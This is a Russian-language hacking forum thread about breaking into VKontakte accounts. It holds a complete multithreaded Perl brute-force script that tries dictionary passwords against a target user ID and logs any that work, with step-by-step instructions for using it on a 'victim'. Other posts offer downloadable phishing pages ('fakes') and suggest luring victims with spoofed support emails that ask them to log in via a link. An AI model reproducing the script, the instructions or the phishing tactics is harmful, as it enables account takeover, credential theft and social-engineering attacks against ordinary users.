Уязвимости, фейки vkontakte.ru

[ArxWolf]

БРУТ ВКОНТАКТЕ НЕ РАБОТАЕТ!!!
Посты, с просьбой взломать страницу "Вконтакте" будут удаляться! для этого есть раздел : [Для просмотра данной ссылки нужно зарегистрироваться]
Посты с флудом: "у меня не получаецо", "я ничего не умею и не понимаю" и т п... будут удаляться
за флуд и вопросы "ПОЧЕМУ НЕ РАБОТАЕТ БРУТ?"[Для просмотра данной ссылки нужно зарегистрироваться]

Строго без флуда, всё по теме, обновляем фейки.

Скачать фейк за 14.10.2009
[Для просмотра данной ссылки нужно зарегистрироваться]

[WereWolf]

Есть брут для вконтакте...

Цитата:

Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):



#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock "HEAD [Для просмотра данной ссылки нужно зарегистрироваться] HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}


--------------------------------------------------------------------------------



Цитата:

--------------------------------------------------------------------------------
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
--------------------------------------------------------------------------------


Как запустить скрипт:

Цитата:

--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.

[ArxWolf]

Цитата:

Сообщение от Алестра

Я в этом смысле тоже не особо сильна, особенно в терминах что такое id? Как я могу его узнать? Попробую взломать сама,надо же учится... В конце концов я не думаю что это в первый и в последний раз

ID это как уник. код юзера, то есть например серийный номер машины.
Узнать его вы можете, зайдя в вконтакт, например так выгладит ваша главная страница профиля [Для просмотра данной ссылки нужно зарегистрироваться]
ID получится 5185**6, то есть то что начинается от id и то знака ?.
Или можете посмотреть его в куках + мыло + хеш пароля

что такое брут и как этим пользоваться?

[Talleya]

Цитата:

Сообщение от сашка

что такое брут и как этим пользоваться?

смотри [Для просмотра данной ссылки нужно зарегистрироваться]

и [Для просмотра данной ссылки нужно зарегистрироваться]

[serhiym]

Народ, как можна заманить жертву (Вконтакте) на ФЕЙК (Сылку) ?

[ArxWolf]

Например через анонимный емайла, там пишите от кого "Support@vkon..." или "admin@vkon..." и посылаете юзеру, в письме уже СИ, можно типа "Нам нужно вас проверить, перейдите по ссылке и войдите", тут уже дело Соц. Инженерии

[serhiym]

а как отправлять анонимное письмо, ну например : [Для просмотра данной ссылки нужно зарегистрироваться] ili [Для просмотра данной ссылки нужно зарегистрироваться] ?

[s4f]

[Для просмотра данной ссылки нужно зарегистрироваться]
не забываем юзать поиск прежде чем спросить!!!

[serhiym]

Цитата:

Сообщение от ArxWolf

Строго без флуда, всё по теме, обновляем фейки.

Фейк за 02.08.08

Wolf, а что дальше надо с ним делать ?

где сохраняютса пароли ?....